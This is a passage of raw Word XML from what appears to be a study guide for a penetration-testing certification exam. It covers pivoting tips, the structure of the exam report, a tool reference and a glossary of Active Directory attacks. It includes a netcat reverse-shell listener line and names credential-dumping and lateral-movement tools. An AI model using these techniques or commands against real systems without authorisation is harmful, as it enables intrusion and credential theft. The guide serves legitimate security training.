      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Screenshot every success as it happens</w:t>
      </w:r>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve"> — you cannot re-pop after the clock stops, and the report is graded.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25E74226" w14:textId="77777777" w:rsidR="00F17F75" w:rsidRPr="00F17F75" w:rsidRDefault="00F17F75" w:rsidP="00F17F75">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Maintain the live map</w:t>
      </w:r>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve"> ("host → segments it reaches") — it makes the double pivot obvious instead of a scramble.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33E170BD" w14:textId="77777777" w:rsidR="00F17F75" w:rsidRPr="00F17F75" w:rsidRDefault="00F17F75" w:rsidP="00F17F75">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Prefer reverse SOCKS</w:t>
      </w:r>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve"> (chisel </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>R:socks</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>socks_proxy</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t>) through egress-filtered ranges; local-mode servers may be blocked inbound.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AAEE0B1" w14:textId="77777777" w:rsidR="00F17F75" w:rsidRPr="00F17F75" w:rsidRDefault="00F17F75" w:rsidP="00F17F75">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Rotate tools, not just payloads</w:t>
      </w:r>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve"> — if MS17-010 won't fire, check patch level and try creds/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t>PtH</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve">; if MSF is flaky over the route, drop to </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t>impacket</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve"> over SOCKS.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51EEE4EE" w14:textId="77777777" w:rsidR="00F17F75" w:rsidRPr="00F17F75" w:rsidRDefault="00F17F75" w:rsidP="00F17F75">
      <w:r w:rsidRPr="00F17F75">
        <w:pict w14:anchorId="0A7E3F2F">
          <v:rect id="_x0000_i1211" style="width:0;height:0" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="54D15740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>24. Reporting (the deliverable)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E0D1574" w14:textId="77777777" w:rsidR="00F17F75" w:rsidRPr="00F17F75" w:rsidRDefault="00F17F75" w:rsidP="00F17F75">
      <w:r w:rsidRPr="00F17F75">
        <w:t>LPT Master requires a professional report:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56FCEFDC" w14:textId="77777777" w:rsidR="00F17F75" w:rsidRPr="00F17F75" w:rsidRDefault="00F17F75" w:rsidP="00F17F75">
      <w:r w:rsidRPr="00F17F75">
        <w:t>1. Executive Summary   - business risk &amp; posture (non-technical)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="408ABA57" w14:textId="77777777" w:rsidR="00F17F75" w:rsidRPr="00F17F75" w:rsidRDefault="00F17F75" w:rsidP="00F17F75">
      <w:r w:rsidRPr="00F17F75">
        <w:t>2. Scope &amp; Methodology - ranges/targets, timeframe, approach</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="251B7945" w14:textId="77777777" w:rsidR="00F17F75" w:rsidRPr="00F17F75" w:rsidRDefault="00F17F75" w:rsidP="00F17F75">
      <w:r w:rsidRPr="00F17F75">
        <w:t>3. Findings            - per finding: Title, Severity (CVSS), Host, Description,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A08017E" w14:textId="77777777" w:rsidR="00F17F75" w:rsidRPr="00F17F75" w:rsidRDefault="00F17F75" w:rsidP="00F17F75">
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve">                         Impact, Evidence (screenshots), Steps to Reproduce, Remediation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="102E05CF" w14:textId="77777777" w:rsidR="00F17F75" w:rsidRPr="00F17F75" w:rsidRDefault="00F17F75" w:rsidP="00F17F75">
      <w:r w:rsidRPr="00F17F75">
        <w:t>4. Attack Narrative    - the chained path: web -&gt; pivot -&gt; double pivot -&gt; DC/domain (with a diagram)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50A1912B" w14:textId="77777777" w:rsidR="00F17F75" w:rsidRPr="00F17F75" w:rsidRDefault="00F17F75" w:rsidP="00F17F75">
      <w:r w:rsidRPr="00F17F75">
        <w:t>5. Remediation Summary - prioritized fixes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="614AF696" w14:textId="77777777" w:rsidR="00F17F75" w:rsidRPr="00F17F75" w:rsidRDefault="00F17F75" w:rsidP="00F17F75">
      <w:r w:rsidRPr="00F17F75">
        <w:t>6. Appendices          - command output, tool versions, full host/subnet map</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13E2BBC6" w14:textId="77777777" w:rsidR="00F17F75" w:rsidRPr="00F17F75" w:rsidRDefault="00F17F75" w:rsidP="00F17F75">
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Tips:</w:t>
      </w:r>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve"> the </w:t>
      </w:r>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>attack narrative + network diagram</w:t>
      </w:r>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve"> is where pivoting scores; every finding needs repro + evidence + a fix; screenshot as you go — you can't reproduce after the clock stops.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C4A6841" w14:textId="77777777" w:rsidR="00F17F75" w:rsidRPr="00F17F75" w:rsidRDefault="00F17F75" w:rsidP="00F17F75">
      <w:r w:rsidRPr="00F17F75">
        <w:pict w14:anchorId="284AB21C">
          <v:rect id="_x0000_i1212" style="width:0;height:0" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D8E70D6" w14:textId="77777777" w:rsidR="00F17F75" w:rsidRPr="00F17F75" w:rsidRDefault="00F17F75" w:rsidP="00F17F75">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>25. Tooling Quick Reference &amp; Glossary</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C8B98E2" w14:textId="77777777" w:rsidR="00F17F75" w:rsidRPr="00F17F75" w:rsidRDefault="00F17F75" w:rsidP="00F17F75">
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Core toolset:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4274F975" w14:textId="77777777" w:rsidR="00F17F75" w:rsidRPr="00F17F75" w:rsidRDefault="00F17F75" w:rsidP="00F17F75">
      <w:r w:rsidRPr="00F17F75">
        <w:t>Recon/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t>enum</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve"> :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t>crackmapexec</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve">, enum4linux-ng, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t>smbmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t>snmpwalk</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t>gobuster</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t>ffuf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t>wpscan</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t>ldapdomaindump</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t>, bloodhound</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C92D1F3" w14:textId="77777777" w:rsidR="00F17F75" w:rsidRPr="00F17F75" w:rsidRDefault="00F17F75" w:rsidP="00F17F75">
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve">Pivot    </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve">  :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve"> ssh (-L/-R/-D/-J), </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t>proxychains</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve">, chisel, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t>socat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t>datapipe</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t>netsh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t>portproxy</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t>,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="478D25F4" w14:textId="77777777" w:rsidR="00F17F75" w:rsidRPr="00F17F75" w:rsidRDefault="00F17F75" w:rsidP="00F17F75">
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve">             </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve"> (autoroute/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t>portfwd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t>socks_proxy</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CF5D0D8" w14:textId="77777777" w:rsidR="00F17F75" w:rsidRPr="00F17F75" w:rsidRDefault="00F17F75" w:rsidP="00F17F75">
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve">Exploit  </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve">  :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t>metasploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t>msfvenom</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t>searchsploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t>sqlmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t>ROPgadget</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t>ropper</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t>pwntools</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve"> (binary), mona</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D59A1B8" w14:textId="77777777" w:rsidR="00F17F75" w:rsidRPr="00F17F75" w:rsidRDefault="00F17F75" w:rsidP="00F17F75">
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve">AD       </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve">  :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t>impacket</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve"> (GetUserSPNs/GetNPUsers/secretsdump/psexec/wmiexec/getST/ticketer),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="029DF2FA" w14:textId="77777777" w:rsidR="00F17F75" w:rsidRPr="00F17F75" w:rsidRDefault="00F17F75" w:rsidP="00F17F75">
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve">             evil-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t>winrm</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t>ADRecon</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve">, PowerView, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t>mimikatz</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t>BloodHound</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="007F2037" w14:textId="77777777" w:rsidR="00F17F75" w:rsidRPr="00F17F75" w:rsidRDefault="00F17F75" w:rsidP="00F17F75">
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve">IoT      </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve">  :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t>binwalk</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve">, strings, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t>qemu</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve">-user, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve"> service scripts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="280384B9" w14:textId="77777777" w:rsidR="00F17F75" w:rsidRPr="00F17F75" w:rsidRDefault="00F17F75" w:rsidP="00F17F75">
      <w:r w:rsidRPr="00F17F75">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Serve/catch: python3 -m </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t>http.server</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t>80 ;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve"> nc -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t>lvnp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve"> 443</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A077429" w14:textId="77777777" w:rsidR="00F17F75" w:rsidRPr="00F17F75" w:rsidRDefault="00F17F75" w:rsidP="00F17F75">
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Glossary:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B00101C" w14:textId="77777777" w:rsidR="00F17F75" w:rsidRPr="00F17F75" w:rsidRDefault="00F17F75" w:rsidP="00F17F75">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Pivot / double pivot</w:t>
      </w:r>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve"> — routing through one (or two chained) compromised hosts to reach segmented networks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C77081B" w14:textId="77777777" w:rsidR="00F17F75" w:rsidRPr="00F17F75" w:rsidRDefault="00F17F75" w:rsidP="00F17F75">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">SOCKS proxy / </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>proxychains</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve"> — generic proxy (ssh -D / </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve"> / chisel) + the tool that routes others through it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D7ED4B2" w14:textId="77777777" w:rsidR="00F17F75" w:rsidRPr="00F17F75" w:rsidRDefault="00F17F75" w:rsidP="00F17F75">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>autoroute</w:t>
      </w:r>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve"> — MSF feature adding a route to an internal subnet through a Meterpreter session.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55B25ED2" w14:textId="77777777" w:rsidR="00F17F75" w:rsidRPr="00F17F75" w:rsidRDefault="00F17F75" w:rsidP="00F17F75">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Tree / Forest</w:t>
      </w:r>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve"> — contiguous-namespace domains / joined trees.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36EC73EF" w14:textId="77777777" w:rsidR="00F17F75" w:rsidRPr="00F17F75" w:rsidRDefault="00F17F75" w:rsidP="00F17F75">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Administrators / Domain Admins / Enterprise Admins</w:t>
      </w:r>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve"> — local-machine / domain / forest top groups.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="282862E7" w14:textId="77777777" w:rsidR="00F17F75" w:rsidRPr="00F17F75" w:rsidRDefault="00F17F75" w:rsidP="00F17F75">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>NTDS.dit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve"> — the AD database on the DC (domain credentials).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="306711E8" w14:textId="77777777" w:rsidR="00F17F75" w:rsidRPr="00F17F75" w:rsidRDefault="00F17F75" w:rsidP="00F17F75">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Kerberoast</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> / AS-REP roast / delegation / </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>PtH</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> / </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>DCSync</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> / Golden &amp; Silver Ticket</w:t>
      </w:r>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve"> — core AD attacks &amp; persistence.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D26D0E3" w14:textId="77777777" w:rsidR="00F17F75" w:rsidRPr="00F17F75" w:rsidRDefault="00F17F75" w:rsidP="00F17F75">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Attack narrative</w:t>
      </w:r>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve"> — the chained engagement story (graded centerpiece) — pair it with a network diagram.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55288BF9" w14:textId="77777777" w:rsidR="00F17F75" w:rsidRPr="00F17F75" w:rsidRDefault="00F17F75" w:rsidP="00F17F75">
      <w:r w:rsidRPr="00F17F75">
        <w:pict w14:anchorId="549FB350">
          <v:rect id="_x0000_i1213" style="width:0;height:0" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F8EC4DF" w14:textId="77777777" w:rsidR="00F17F75" w:rsidRPr="00F17F75" w:rsidRDefault="00F17F75" w:rsidP="00F17F75">
